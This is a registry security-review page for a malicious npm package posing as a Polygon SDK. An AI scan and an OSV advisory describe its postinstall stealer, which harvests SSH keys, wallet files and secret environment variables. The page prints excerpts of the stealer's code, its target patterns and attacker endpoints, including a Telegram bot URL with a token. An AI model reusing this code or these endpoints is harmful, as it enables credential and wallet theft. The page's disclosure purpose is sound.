registry  /  @wagni_bot/polygon-sdk  /  1.0.0

@wagni_bot/polygon-sdk@1.0.0

Unofficial polygon-sdk SDK

AI Security Review

scanned 9h ago · by lpm-firewall-ai

The package executes a postinstall credential harvester. It reads sensitive project, home, SSH, and environment data and exfiltrates it to Telegram.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install runs package.json postinstall script
Impact
Exposure of environment secrets, wallet/seed material, private keys, SSH configuration/keys, and host metadata
Mechanism
install-time credential and file exfiltration
Attack narrative
On installation, npm invokes postinstall.js. The script posts host metadata to a Telegram bot, scans the current project, the user's home directory, and ~/.ssh for credential-like files, chunks their contents, and sends them to the same Telegram endpoint. It also selects sensitive environment variables and exfiltrates their values.
Rationale
Direct source inspection confirms unconsented install-time credential harvesting and exfiltration to a hardcoded Telegram bot. This is concrete malicious behavior unrelated to a Polygon SDK.
Evidence
package.jsonpostinstall.jsprocess.cwd() files matching .env/.cred/.pem/.key/mnemonic/seed/wallet/secretos.homedir() files matching .env/.cred/.pem/.key/mnemonic/seed/wallet/secret~/.ssh files matching id_rsa/id_ed25519/.pem/.key/config
Network endpoints1
api.telegram.org/bot8804087989:AAHUia-5DCloXsg9M9QhffTsHO5J_6FAxQM/sendMessage

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10032
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @wagni_bot/polygon-sdk (npm)
Details
The package's postinstall.js runs unconditionally on `npm install` and scans the installer's current working directory and home directory — including ~/.ssh, ~/.ethereum, ~/.config/ethereum, ~/.solana, ~/.bitcoin, and ~/Library/Ethereum — for wallet keystores, PEM/SSH private keys (id_rsa, id_ed25519,.pem,.key), and files matching seed/mnemonic/keystore/wallet/secret/private patterns. Matching file contents (truncated to 10000 bytes) plus a filtered subset of process.env (variables whose names contain PRIVATE, SECRET, TOKEN, KEY, PASSWORD, MNEMONIC, SEED, WALLET, or AWS) are POSTed to a hardcoded bare-IP endpoint at http://107.161.90.180:7777. Each request also carries os.hostname(), os.userInfo().username, and process.cwd() so the attacker can attribute the stolen secrets to a specific victim host. The advertised `main` (index.js) exports an empty object — the package has no legitimate functionality; the credential stealer is its only behavior. The name `@wagni_bot/polygon-sdk` with description 'Unofficial polygon-sdk SDK' impersonates the Polygon blockchain SDK ecosystem to attract crypto developers whose environments are especially likely to contain wallet keystores and seed phrases.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines postinstall: node postinstall.js, so code runs at npm install time.
  • postinstall.js sends install host/user/cwd/platform details to Telegram via https.request.
  • postinstall.js recursively reads cwd and home files matching .env, .cred, .pem, .key, mnemonic, seed, wallet, secret.
  • postinstall.js reads ~/.ssh files matching id_rsa, id_ed25519, .pem, .key, config.
  • postinstall.js filters process.env for PRIVATE/SECRET/TOKEN/API_KEY/PASSWORD/MNEMONIC/SEED/WALLET/AWS and sends values externally.
  • No package-aligned SDK functionality is present in inspected package file list beyond index.js entrypoint.
Evidence against
  • No destructive file writes or persistence mechanisms observed.
  • No child_process, eval, vm, dynamic require, native binary, or staged payload loading observed.
Behavioral surface
Source
EnvironmentVarsFilesystemNetwork
Supply chain
HighEntropyStringsUrlStrings
Manifest
NoLicense
scanned 2 file(s), 4.10 KB of source, external domains: api.telegram.org

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
postinstall.jsView file
1#!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

postinstall.jsView on unpkg · L1
1Trigger-reachable chain: scripts.postinstall -> postinstall.js L1: #!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

postinstall.jsView on unpkg · L1

Findings

2 Critical1 High4 Medium5 Low
CriticalCredential Exfiltrationpostinstall.js
CriticalTrigger Reachable Dangerous Capabilitypostinstall.js
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings
LowNo License